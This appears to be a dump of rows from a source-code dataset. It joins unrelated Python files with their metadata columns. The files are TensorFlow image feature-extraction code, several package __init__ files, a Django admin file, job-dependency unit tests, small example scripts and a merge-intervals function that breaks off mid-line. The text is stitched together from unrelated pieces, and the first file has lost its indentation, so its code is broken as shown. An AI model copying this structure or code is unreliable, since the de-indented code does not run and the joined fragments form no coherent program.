print os.path.abspath(file_meta_graph)
print file_ckpt
tmp_img_list = []
img_list = []
with open(file_img, 'r') as f:
tmp_img_list = f.readlines()
for item_img in tmp_img_list:
img_list.append(item_img.split(' ')[0])
print "--------------------------------------------------"
print " feature extraction starts"
print "--------------------------------------------------"
feats = []
names = []
start_time = time.time()
with tf.Session() as sess:
saver = tf.train.import_meta_graph(file_meta_graph)
saver.restore(sess, file_ckpt)
graph = tf.get_default_graph()
x_input = graph.get_tensor_by_name('encoder/input_img:0')
latent_feature = graph.get_tensor_by_name('variance/latent_feature:0')
for i, img_path in enumerate(img_list):
img = utils.img_process(img_path)
norm_feat = sess.run(latent_feature, feed_dict={x_input: img})
img_name = img_path
# norm_feat = np.hstack((norm_feat,np.zeros([160,],dtype=np.float32)))
feats.append(norm_feat.flatten())
names.append(img_name)
print "extracting feature from image No. %d , %d images in total" % ((i + 1), len(img_list))
end_time = time.time()
print ("final_feature extract time:", (end_time - start_time))
feats = np.array(feats)
print "--------------------------------------------------"
print " writing feature extraction results ..."
print "--------------------------------------------------"
# directory for storing extracted features
output = file_feature_output
h5f = h5py.File(output, 'w')
h5f.create_dataset('dataset_1', data=feats)
h5f.create_dataset('dataset_2', data=names)
h5f.close()
def feature_generator_basenet(file_img, checkpoints_dir, file_feature_output):
tmp_img_list = []
img_list = []
with open(file_img, 'r') as f:
tmp_img_list = f.readlines()
for item_img in tmp_img_list:
img_list.append(item_img.split(' ')[0])
print "--------------------------------------------------"
print " feature extraction starts"
print "--------------------------------------------------"
feats = []
names = []
from tensorflow.contrib import slim
x_input = tf.placeholder(tf.float32, shape=[None, 224, 224, 3], name='input_img')
# latent_mean, latent_stddev = encoder(x_input, train_logical=True, latent_dim=LATENT_DIM)
# latent_mean, latent_stddev = encoder_vgg16(x_input, latent_dim=LATENT_DIM)
# latent_mean, latent_stddev = encoder_vgg19(x_input, latent_dim=LATENT_DIM)
# latent_mean, latent_stddev = encoder_inceptionv1(x_input, latent_dim=LATENT_DIM)
# latent_mean, latent_stddev = encoder_inceptionv4(x_input, latent_dim=LATENT_DIM)
# latent_mean, latent_stddev = encoder_inception_resnetv2(x_input, latent_dim=LATENT_DIM)
# latent_mean, latent_stddev = encoder_resnetv2_152(x_input, latent_dim=LATENT_DIM)#参数过多,训练很慢
with slim.arg_scope(resnet_v2.resnet_arg_scope()):
logits, _ = resnet_v2.resnet_v2_101(x_input, num_classes=None, is_training=False)
init_fn = slim.assign_from_checkpoint_fn(
os.path.join(checkpoints_dir, 'resnet_v2_101.ckpt'),
slim.get_model_variables('resnet_v2_101'))
start_time = time.time()
with tf.Session() as sess:
init_fn(sess)
latent_feature = logits
for i, img_path in enumerate(img_list):
img = utils.img_process_vgg_tf(img_path)
norm_feat = sess.run(latent_feature, feed_dict={x_input: img})
img_name = img_path
# norm_feat = np.hstack((norm_feat,np.zeros([160,],dtype=np.float32)))
feats.append(norm_feat.flatten())
names.append(img_name)
print "extracting feature from image No. %d , %d images in total" % ((i + 1), len(img_list))
end_time = time.time()
print ("final_feature extract time:", (end_time - start_time))
feats = np.array(feats)
print "--------------------------------------------------"
print " writing feature extraction results ..."
print "--------------------------------------------------"
# directory for storing extracted features
output = file_feature_output
h5f = h5py.File(output, 'w')
h5f.create_dataset('dataset_1', data=feats)
h5f.create_dataset('dataset_2', data=names)
h5f.close()
def feature_generator_basenet_vgg(file_img, file_feature_output):
tmp_img_list = []
img_list = []
with open(file_img, 'r') as f:
tmp_img_list = f.readlines()
for item_img in tmp_img_list:
img_list.append(item_img.split(' ')[0])
print "--------------------------------------------------"
print " feature extraction starts"
print "--------------------------------------------------"
feats = []
names = []
# model = DenseNETMAX()
model = VGG16_MODIFIED()
start_time = time.time()
for i, img_path in enumerate(img_list):
norm_feat = model.extract_feat(img_path)
# dct_feat = DCT_binaray(img_path)
# final_feat = np.append(dct_feat, norm_feat)
img_name = img_path
# norm_feat = np.hstack((norm_feat,np.zeros([160,],dtype=np.float32)))
feats.append(norm_feat.flatten())
names.append(img_name)
print "extracting feature from image No. %d , %d images in total" % ((i + 1), len(img_list))
end_time = time.time()
print ("final_feature extract time:", (end_time - start_time))
feats = np.array(feats)
print "--------------------------------------------------"
print " writing feature extraction results ..."
print "--------------------------------------------------"
# directory for storing extracted features
h5f = h5py.File(file_feature_output, 'w')
h5f.create_dataset('dataset_1', data=feats)
h5f.create_dataset('dataset_2', data=names)
h5f.close()
if __name__ == "__main__":
args = {'index_basenet': './result_generator/features/feature_densenet169_trans_imgs_basenet.h5',
'index': '../features/feature_vae_resnetv2_101_trans_imgs_136000_basenet.h5',
'database': '/data/datasets/trans_imgs'}
# feature_generator_densenet(dir_img=args["database"], file_feature_output=args["index"])
# feature_generator_rmac_vgg16(dir_img=args["database"], file_feature_output=args["index"])
# file_ckpt = '/shihuijie/project/densenet/model_new/model_vae_resnetv2_101/vae-136000'
# feature_generator_vae(file_img='/shihuijie/project/vae/data/image_list.txt',
# file_meta_graph=file_ckpt + '.meta',
# file_ckpt=file_ckpt,
# file_feature_output=args["index"])
feature_generator_basenet(file_img='/shihuijie/project/vae/data/image_list.txt',
checkpoints_dir='/shihuijie/project/vae/checkpoints/resnet_v2_101/',
file_feature_output=args["index_basenet"])
# feature_generator_basenet_vgg(file_img='/shihuijie/project/vae/data/image_list.txt',
# file_feature_output=args["index_basenet"])
# feature_generator_densenet(file_img='/shihuijie/project/vae-system/data/image_list.txt',
# file_feature_output=args["index_basenet"])
| 41.170029
| 108
| 0.577628
| 1,742
| 14,286
| 4.46039
| 0.136625
| 0.030631
| 0.037194
| 0.029601
| 0.762806
| 0.722394
| 0.709653
| 0.680309
| 0.671943
| 0.634492
| 0
| 0.017303
| 0.235405
| 14,286
| 346
| 109
| 41.289017
| 0.69404
| 0.181926
| 0
| 0.748936
| 0
| 0
| 0.226017
| 0.119805
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.06383
| null | null | 0.2
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
dfab55c248bbf8d6b41a732aaaca0f2e59e9bb27
| 143
|
py
|
Python
|
transiter/parse/__init__.py
|
jamespfennell/realtimerail
|
352dd7d185d3501d28276476e1390d3288735690
|
[
"MIT"
] | 10
|
2018-10-25T13:07:42.000Z
|
2022-02-08T20:49:07.000Z
|
transiter/parse/__init__.py
|
jamespfennell/realtimerail
|
352dd7d185d3501d28276476e1390d3288735690
|
[
"MIT"
] | 80
|
2019-04-06T23:01:44.000Z
|
2022-02-05T23:35:54.000Z
|
transiter/parse/__init__.py
|
jamespfennell/realtimerail
|
352dd7d185d3501d28276476e1390d3288735690
|
[
"MIT"
] | 3
|
2021-05-07T16:43:39.000Z
|
2021-07-15T18:06:07.000Z
|
from .gtfsrealtime import GtfsRealtimeParser
from .gtfsstatic import GtfsStaticParser
from .parser import TransiterParser
from .types import *
| 28.6
| 44
| 0.853147
| 15
| 143
| 8.133333
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111888
| 143
| 4
| 45
| 35.75
| 0.96063
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
dfabdc6259101f24a9510d57de43fab9ffa7c391
| 46
|
py
|
Python
|
test.py
|
chunkman/mit-python
|
b3fcae2d90fc4dde5866c27cc4e42590bb31e79c
|
[
"MIT"
] | null | null | null |
test.py
|
chunkman/mit-python
|
b3fcae2d90fc4dde5866c27cc4e42590bb31e79c
|
[
"MIT"
] | null | null | null |
test.py
|
chunkman/mit-python
|
b3fcae2d90fc4dde5866c27cc4e42590bb31e79c
|
[
"MIT"
] | null | null | null |
#This is just a test
#Just adding another line
| 23
| 25
| 0.782609
| 9
| 46
| 4
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 46
| 2
| 25
| 23
| 0.947368
| 0.934783
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
dfb1bc503f56cd3573c205c201077e6d8fe70902
| 165
|
py
|
Python
|
watchlist/admin.py
|
Wings30306/yomdb
|
13fa3442bb99856169d5b1c9d0ae1600fa807c19
|
[
"MIT"
] | null | null | null |
watchlist/admin.py
|
Wings30306/yomdb
|
13fa3442bb99856169d5b1c9d0ae1600fa807c19
|
[
"MIT"
] | 19
|
2020-07-11T08:10:50.000Z
|
2021-09-22T19:30:17.000Z
|
watchlist/admin.py
|
Wings30306/yomdb
|
13fa3442bb99856169d5b1c9d0ae1600fa807c19
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Movie, WatchlistItem
# Register your models here.
admin.site.register(Movie)
admin.site.register(WatchlistItem)
| 27.5
| 40
| 0.824242
| 22
| 165
| 6.181818
| 0.545455
| 0.132353
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09697
| 165
| 6
| 41
| 27.5
| 0.912752
| 0.157576
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
5f01002fa23dd54fbb3b80ca923cf9eb10d3c8a4
| 169
|
py
|
Python
|
ngboost/distns/__init__.py
|
kshramt/ngboost
|
693efc3fe40db460c1b3d5e129a8a3356f502864
|
[
"Apache-2.0"
] | null | null | null |
ngboost/distns/__init__.py
|
kshramt/ngboost
|
693efc3fe40db460c1b3d5e129a8a3356f502864
|
[
"Apache-2.0"
] | null | null | null |
ngboost/distns/__init__.py
|
kshramt/ngboost
|
693efc3fe40db460c1b3d5e129a8a3356f502864
|
[
"Apache-2.0"
] | null | null | null |
from .normal import Normal, HomoskedasticNormal
from .laplace import Laplace
from .lognormal import LogNormal, HomoskedasticLogNormal
from .loglaplace import LogLaplace
| 33.8
| 56
| 0.857988
| 18
| 169
| 8.055556
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106509
| 169
| 4
| 57
| 42.25
| 0.960265
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
5f1a73da099ed0a7f3b778e4e9b10103231bb88c
| 2,552
|
py
|
Python
|
sdk/python/pulumi_azure_native/domainregistration/__init__.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/domainregistration/__init__.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/domainregistration/__init__.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from .. import _utilities
import typing
# Export this package's modules as members:
from ._enums import *
from .domain import *
from .domain_ownership_identifier import *
from .get_domain import *
from .get_domain_ownership_identifier import *
from .list_domain_recommendations import *
from .list_top_level_domain_agreements import *
from ._inputs import *
from . import outputs
# Make subpackages available:
if typing.TYPE_CHECKING:
import pulumi_azure_native.domainregistration.v20150401 as __v20150401
v20150401 = __v20150401
import pulumi_azure_native.domainregistration.v20180201 as __v20180201
v20180201 = __v20180201
import pulumi_azure_native.domainregistration.v20190801 as __v20190801
v20190801 = __v20190801
import pulumi_azure_native.domainregistration.v20200601 as __v20200601
v20200601 = __v20200601
import pulumi_azure_native.domainregistration.v20200901 as __v20200901
v20200901 = __v20200901
import pulumi_azure_native.domainregistration.v20201001 as __v20201001
v20201001 = __v20201001
import pulumi_azure_native.domainregistration.v20201201 as __v20201201
v20201201 = __v20201201
import pulumi_azure_native.domainregistration.v20210101 as __v20210101
v20210101 = __v20210101
import pulumi_azure_native.domainregistration.v20210115 as __v20210115
v20210115 = __v20210115
import pulumi_azure_native.domainregistration.v20210201 as __v20210201
v20210201 = __v20210201
else:
v20150401 = _utilities.lazy_import('pulumi_azure_native.domainregistration.v20150401')
v20180201 = _utilities.lazy_import('pulumi_azure_native.domainregistration.v20180201')
v20190801 = _utilities.lazy_import('pulumi_azure_native.domainregistration.v20190801')
v20200601 = _utilities.lazy_import('pulumi_azure_native.domainregistration.v20200601')
v20200901 = _utilities.lazy_import('pulumi_azure_native.domainregistration.v20200901')
v20201001 = _utilities.lazy_import('pulumi_azure_native.domainregistration.v20201001')
v20201201 = _utilities.lazy_import('pulumi_azure_native.domainregistration.v20201201')
v20210101 = _utilities.lazy_import('pulumi_azure_native.domainregistration.v20210101')
v20210115 = _utilities.lazy_import('pulumi_azure_native.domainregistration.v20210115')
v20210201 = _utilities.lazy_import('pulumi_azure_native.domainregistration.v20210201')
| 49.076923
| 90
| 0.816223
| 277
| 2,552
| 7.101083
| 0.245487
| 0.122013
| 0.172852
| 0.233859
| 0.610066
| 0.574479
| 0.27453
| 0
| 0
| 0
| 0
| 0.214636
| 0.121865
| 2,552
| 51
| 91
| 50.039216
| 0.663097
| 0.090517
| 0
| 0
| 1
| 0
| 0.207433
| 0.207433
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.72093
| 0
| 0.72093
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
a024a89b5b2c32486182a24e363a3ee8a1ba3d81
| 4,800
|
py
|
Python
|
tests/unit/dataactcore/test_function_bag.py
|
dael-victoria-reyes/data-act-broker-backend
|
f83c7cad29cac24d95f45a262710dc1564de7dc1
|
[
"CC0-1.0"
] | 1
|
2019-06-22T21:53:16.000Z
|
2019-06-22T21:53:16.000Z
|
tests/unit/dataactcore/test_function_bag.py
|
dael-victoria-reyes/data-act-broker-backend
|
f83c7cad29cac24d95f45a262710dc1564de7dc1
|
[
"CC0-1.0"
] | null | null | null |
tests/unit/dataactcore/test_function_bag.py
|
dael-victoria-reyes/data-act-broker-backend
|
f83c7cad29cac24d95f45a262710dc1564de7dc1
|
[
"CC0-1.0"
] | null | null | null |
import pytest
from unittest.mock import patch
from dataactcore.aws.sqsHandler import SQSMockQueue
from dataactcore.models.jobModels import JobDependency
from dataactcore.models.lookups import JOB_STATUS_DICT, JOB_TYPE_DICT, FILE_TYPE_DICT
from dataactcore.interfaces.function_bag import check_job_dependencies
from tests.unit.dataactcore.factories.job import JobFactory, SubmissionFactory
@pytest.mark.usefixtures("job_constants")
def test_check_job_dependencies_not_finished(database):
""" Tests check_job_dependencies with a job that isn't finished """
sess = database.session
sub = SubmissionFactory(submission_id=1)
job = JobFactory(submission_id=sub.submission_id, job_status_id=JOB_STATUS_DICT['waiting'],
job_type_id=JOB_TYPE_DICT['csv_record_validation'], file_type_id=FILE_TYPE_DICT['award'])
sess.add_all([sub, job])
sess.commit()
with pytest.raises(ValueError):
check_job_dependencies(job.job_id)
@pytest.mark.usefixtures("job_constants")
def test_check_job_dependencies_has_unfinished_dependencies(database):
""" Tests check_job_dependencies with a job that isn't finished """
sess = database.session
sub = SubmissionFactory(submission_id=1)
job = JobFactory(submission_id=sub.submission_id, job_status_id=JOB_STATUS_DICT['finished'],
job_type_id=JOB_TYPE_DICT['csv_record_validation'], file_type_id=FILE_TYPE_DICT['award'],
number_of_errors=0)
job_2 = JobFactory(submission_id=sub.submission_id, job_status_id=JOB_STATUS_DICT['waiting'],
job_type_id=JOB_TYPE_DICT['csv_record_validation'], file_type_id=FILE_TYPE_DICT['award'])
job_3 = JobFactory(submission_id=sub.submission_id, job_status_id=JOB_STATUS_DICT['waiting'],
job_type_id=JOB_TYPE_DICT['csv_record_validation'], file_type_id=FILE_TYPE_DICT['award'],
number_of_errors=0)
sess.add_all([sub, job, job_2, job_3])
sess.commit()
# Job 1 finished, it is a prerequisite for job 2 (waiting)
job_dep = JobDependency(job_id=job_2.job_id, prerequisite_id=job.job_id)
# Job 3 is also a prerequisite of job 2, it's not done, job 2 should stay in "waiting"
job_dep_2 = JobDependency(job_id=job_2.job_id, prerequisite_id=job_3.job_id)
sess.add_all([job_dep, job_dep_2])
sess.commit()
check_job_dependencies(job.job_id)
assert job_2.job_status_id == JOB_STATUS_DICT['waiting']
@pytest.mark.usefixtures("job_constants")
def test_check_job_dependencies_prior_dependency_has_errors(database):
""" Tests check_job_dependencies with a job that is finished but has errors """
sess = database.session
sub = SubmissionFactory(submission_id=1)
job = JobFactory(submission_id=sub.submission_id, job_status_id=JOB_STATUS_DICT['finished'],
job_type_id=JOB_TYPE_DICT['csv_record_validation'], file_type_id=FILE_TYPE_DICT['award'],
number_of_errors=3)
job_2 = JobFactory(submission_id=sub.submission_id, job_status_id=JOB_STATUS_DICT['waiting'],
job_type_id=JOB_TYPE_DICT['csv_record_validation'], file_type_id=FILE_TYPE_DICT['award'])
sess.add_all([sub, job, job_2])
sess.commit()
# Job 1 finished, it is a prerequisite for job 2 (waiting) but it has errors
job_dep = JobDependency(job_id=job_2.job_id, prerequisite_id=job.job_id)
sess.add(job_dep)
sess.commit()
check_job_dependencies(job.job_id)
assert job_2.job_status_id == JOB_STATUS_DICT['waiting']
@patch('dataactcore.interfaces.function_bag.sqs_queue')
@pytest.mark.usefixtures("job_constants")
def test_check_job_dependencies_ready(mock_sqs_queue, database):
    """ Tests check_job_dependencies with a job that can be set to ready """
    # Mock so it always returns the mock queue for the test
    mock_sqs_queue.return_value = SQSMockQueue
    sess = database.session
    sub = SubmissionFactory(submission_id=1)
    job = JobFactory(submission_id=sub.submission_id, job_status_id=JOB_STATUS_DICT['finished'],
                     job_type_id=JOB_TYPE_DICT['csv_record_validation'], file_type_id=FILE_TYPE_DICT['award'],
                     number_of_errors=0)
    job_2 = JobFactory(submission_id=sub.submission_id, job_status_id=JOB_STATUS_DICT['waiting'],
                       job_type_id=JOB_TYPE_DICT['csv_record_validation'], file_type_id=FILE_TYPE_DICT['award'])
    sess.add_all([sub, job, job_2])
    sess.commit()
    # Job 1 finished with no errors; it is the only prerequisite for job 2 (waiting),
    # so job 2 can be moved to "ready"
    job_dep = JobDependency(job_id=job_2.job_id, prerequisite_id=job.job_id)
    sess.add(job_dep)
    sess.commit()

    check_job_dependencies(job.job_id)
    assert job_2.job_status_id == JOB_STATUS_DICT['ready']
| 47.058824
| 112
| 0.738958
| 706
| 4,800
| 4.654391
| 0.133144
| 0.054778
| 0.063603
| 0.046865
| 0.780889
| 0.780889
| 0.772368
| 0.766281
| 0.766281
| 0.738892
| 0
| 0.008739
| 0.165625
| 4,800
| 101
| 113
| 47.524752
| 0.811735
| 0.126458
| 0
| 0.690141
| 0
| 0
| 0.091979
| 0.051153
| 0
| 0
| 0
| 0
| 0.042254
| 1
| 0.056338
| false
| 0
| 0.098592
| 0
| 0.15493
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
a037fcfc8dd8f8addb4268d02c2c36c9fcd33ad9
| 58
|
py
|
Python
|
___Python/Daniel/2018-06-25-VHS-Bielefeld-Python/p09_isbn/m02_init_example.py
|
uvenil/PythonKurs201806
|
85afa9c9515f5dd8bec0c546f077d8cc39568fe8
|
[
"Apache-2.0"
] | null | null | null |
___Python/Daniel/2018-06-25-VHS-Bielefeld-Python/p09_isbn/m02_init_example.py
|
uvenil/PythonKurs201806
|
85afa9c9515f5dd8bec0c546f077d8cc39568fe8
|
[
"Apache-2.0"
] | null | null | null |
___Python/Daniel/2018-06-25-VHS-Bielefeld-Python/p09_isbn/m02_init_example.py
|
uvenil/PythonKurs201806
|
85afa9c9515f5dd8bec0c546f077d8cc39568fe8
|
[
"Apache-2.0"
] | null | null | null |
from p10_requests import *
# Explicit import: relying on the wildcard import above to provide `math` is
# fragile — if p10_requests stops (re-)exporting it, print(math.pi) raises NameError.
import math

# FOO is expected to be defined by p10_requests (brought in by the wildcard import)
print(FOO)
print(math.pi)
| 11.6
| 27
| 0.706897
| 9
| 58
| 4.444444
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.042553
| 0.189655
| 58
| 4
| 28
| 14.5
| 0.808511
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 5
|
a03f2d9b64a8f2fadf13ccde2d3f7162098d158f
| 88
|
py
|
Python
|
core/data_structure/edge.py
|
HuynhThanhQuan/graph-network
|
e429a641e7baecad9765700cac580cfbdedbe1bd
|
[
"MIT"
] | null | null | null |
core/data_structure/edge.py
|
HuynhThanhQuan/graph-network
|
e429a641e7baecad9765700cac580cfbdedbe1bd
|
[
"MIT"
] | 11
|
2020-11-13T18:29:37.000Z
|
2022-02-10T00:25:15.000Z
|
core/data_structure/edge.py
|
HuynhThanhQuan/graph-network
|
e429a641e7baecad9765700cac580cfbdedbe1bd
|
[
"MIT"
] | null | null | null |
class Edge:
    """Base type for all edge kinds in the graph."""


class Loop(Edge):
    """An edge whose two endpoints are the same vertex."""


class ParallelEdge(Edge):
    """One of several edges sharing the same pair of endpoints."""
| 7.333333
| 25
| 0.625
| 11
| 88
| 5
| 0.454545
| 0.436364
| 0.472727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.295455
| 88
| 11
| 26
| 8
| 0.887097
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
a04fc64fbed860cf0cba109a0bd75fb13d254e98
| 145
|
py
|
Python
|
multiprocessing_talk/__init__.py
|
surfaceowl/python_multiprocessing_talk
|
b71cc924895be2d41b91b1b5b193888e19bba7b5
|
[
"MIT"
] | 3
|
2022-03-17T02:31:50.000Z
|
2022-03-17T23:21:12.000Z
|
multiprocessing_talk/__init__.py
|
surfaceowl/python_multiprocessing_talk
|
b71cc924895be2d41b91b1b5b193888e19bba7b5
|
[
"MIT"
] | null | null | null |
multiprocessing_talk/__init__.py
|
surfaceowl/python_multiprocessing_talk
|
b71cc924895be2d41b91b1b5b193888e19bba7b5
|
[
"MIT"
] | 2
|
2022-03-15T23:16:09.000Z
|
2022-03-17T06:09:16.000Z
|
from .__version__ import application_name, author, version
from .process import main_process, CalculateE, GetDirInfo
from .pool import main_pool
| 36.25
| 58
| 0.841379
| 19
| 145
| 6.052632
| 0.578947
| 0.173913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110345
| 145
| 3
| 59
| 48.333333
| 0.891473
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
a074768a0b5a466f53ccf135606460e146ae3851
| 78
|
py
|
Python
|
pruebamodelos.py
|
Andresalsu/dashboard_prescriptiva
|
386a586ee0a60aa5567b63eeae2d294a1c1b939c
|
[
"MIT"
] | 1
|
2020-05-20T23:31:47.000Z
|
2020-05-20T23:31:47.000Z
|
pruebamodelos.py
|
Andresalsu/dashboard_prescriptiva
|
386a586ee0a60aa5567b63eeae2d294a1c1b939c
|
[
"MIT"
] | 1
|
2019-11-05T19:20:04.000Z
|
2019-11-05T19:20:04.000Z
|
pruebamodelos.py
|
Andresalsu/dashboard_prescriptiva
|
386a586ee0a60aa5567b63eeae2d294a1c1b939c
|
[
"MIT"
] | 2
|
2019-10-28T21:04:47.000Z
|
2019-11-05T19:56:55.000Z
|
from pruebasistema import buscarTweets

# Search for the keyword 'ecaes' with empty filter arguments and show the raw result.
resultado = buscarTweets('ecaes', '', '', '')
print(resultado)
| 26
| 38
| 0.730769
| 7
| 78
| 8.142857
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 78
| 3
| 39
| 26
| 0.791667
| 0
| 0
| 0
| 0
| 0
| 0.063291
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 5
|
a077bee1662c0ad521f759597f8e644ae38a1678
| 2,905
|
py
|
Python
|
datastructures/arrays/merge_intervals.py
|
sikakente/educative-io-python
|
be6e6c3534bf76e6f77addce16d1ab0c40e3e48d
|
[
"MIT"
] | 1
|
2021-12-28T21:19:53.000Z
|
2021-12-28T21:19:53.000Z
|
datastructures/arrays/merge_intervals.py
|
sikakente/educative-io-python
|
be6e6c3534bf76e6f77addce16d1ab0c40e3e48d
|
[
"MIT"
] | 72
|
2022-02-01T18:18:47.000Z
|
2022-03-13T12:31:26.000Z
|
datastructures/arrays/merge_intervals.py
|
sikakente/educative-io-python
|
be6e6c3534bf76e6f77addce16d1ab0c40e3e48d
|
[
"MIT"
] | null | null | null |
"""
Problem Statement
----------------
Given an array of intervals where intervals[i] = [starti, endi],
merge all overlapping intervals, and return an array of the non-overlapping intervals
that cover all the intervals in the input.
Input
-----
list of intervals
Output
-------
List of merged intervals
"""
from collections import namedtuple
Interval = namedtuple("Interval", "lower_bound, upper_bound")
def merge_intervals(intervals):
    """Merge all overlapping closed intervals.

    Quadratic reference implementation: each interval is compared against every
    interval merged so far. See merge_intervals_faster for the linear-scan variant.

    Args:
        intervals: iterable of [start, end] (or (start, end)) pairs, in any order.

    Returns:
        Sorted list of merged, non-overlapping [lower_bound, upper_bound] lists.

    >>> merge_intervals([[1, 3], [2, 6], [8, 10], [15, 18]])
    [[1, 6], [8, 10], [15, 18]]
    >>> merge_intervals([])
    []
    """
    intervals = list(sorted(intervals))
    if not intervals:
        # The original indexed intervals[0] unconditionally and raised IndexError
        # on empty input; an empty merge result is the natural answer instead.
        return []
    merged = [(intervals[0][0], intervals[0][1])]
    for i in range(1, len(intervals)):
        cur_lower, cur_upper = intervals[i][0], intervals[i][1]
        overlapped = False
        for idx in range(len(merged)):
            lower, upper = merged[idx]
            # Closed-interval overlap: either endpoint of the current interval
            # falls inside an already-merged interval.
            if lower <= cur_lower <= upper or lower <= cur_upper <= upper:
